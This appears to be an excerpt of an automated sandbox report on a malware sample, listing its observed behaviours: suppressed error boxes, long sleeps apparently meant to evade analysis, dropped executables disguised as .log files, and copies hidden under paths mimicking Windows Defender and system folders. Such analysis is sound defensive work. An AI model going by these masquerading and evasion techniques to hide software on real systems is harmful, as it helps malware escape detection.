Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\CbsTemp\System.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Memory allocated: 1140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Memory allocated: 1AC10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Memory allocated: 1690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Memory allocated: 1B210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Memory allocated: 1160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Memory allocated: 1AB40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Memory allocated: FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Memory allocated: 1ABD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Memory allocated: 1240000 memory reserve \| memory write watch
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Memory allocated: 1AF60000 memory reserve \| memory write watch
Source: C:\Windows\CbsTemp\System.exe	Memory allocated: 3110000 memory reserve \| memory write watch
Source: C:\Windows\CbsTemp\System.exe	Memory allocated: 1B340000 memory reserve \| memory write watch
Source: C:\Windows\CbsTemp\System.exe	Memory allocated: E80000 memory reserve \| memory write watch
Source: C:\Windows\CbsTemp\System.exe	Memory allocated: 1ABF0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Memory allocated: 710000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Memory allocated: 1A650000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 599653	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 599496	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 596528	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\CbsTemp\System.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\CbsTemp\System.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe

Window / User API: threadDelayed 5235

Jump to behavior

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xOlSJheb.log	Jump to dropped file
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\TnWHzEjm.log	Jump to dropped file
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pZhlLBKs.log	Jump to dropped file
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NvtiWYey.log	Jump to dropped file
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GxFitJjJ.log	Jump to dropped file
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OsUqsYts.log	Jump to dropped file
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QgYydmoq.log	Jump to dropped file

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -599653s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -599496s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -99887s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -99504s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -99375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -99265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -99156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -99046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -98937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -98828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -98718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -98609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -98500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -98387s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -98265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -98156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -98046s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -97937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -97826s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -596640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8036	Thread sleep time: -596528s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8020	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 7520	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8124	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 8172	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe TID: 7204	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe TID: 7188	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\CbsTemp\System.exe TID: 7268	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\CbsTemp\System.exe TID: 7196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe TID: 792	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\Windows Defender\Platform\gmRWetzDcocJEC.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\CbsTemp\System.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\CbsTemp\System.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 599653	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 599496	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 99887	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 99504	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 99375	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 99265	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 99156	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 99046	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 98937	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 98828	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 98718	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 98609	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 98500	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 98387	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 98265	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 98156	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 98046	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 97937	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 97826	Jump to behavior
Source: C:\Users\user\Desktop\Etqq32Yuw4.exe	Thread delayed: delay time: 596750	Jump to behavior
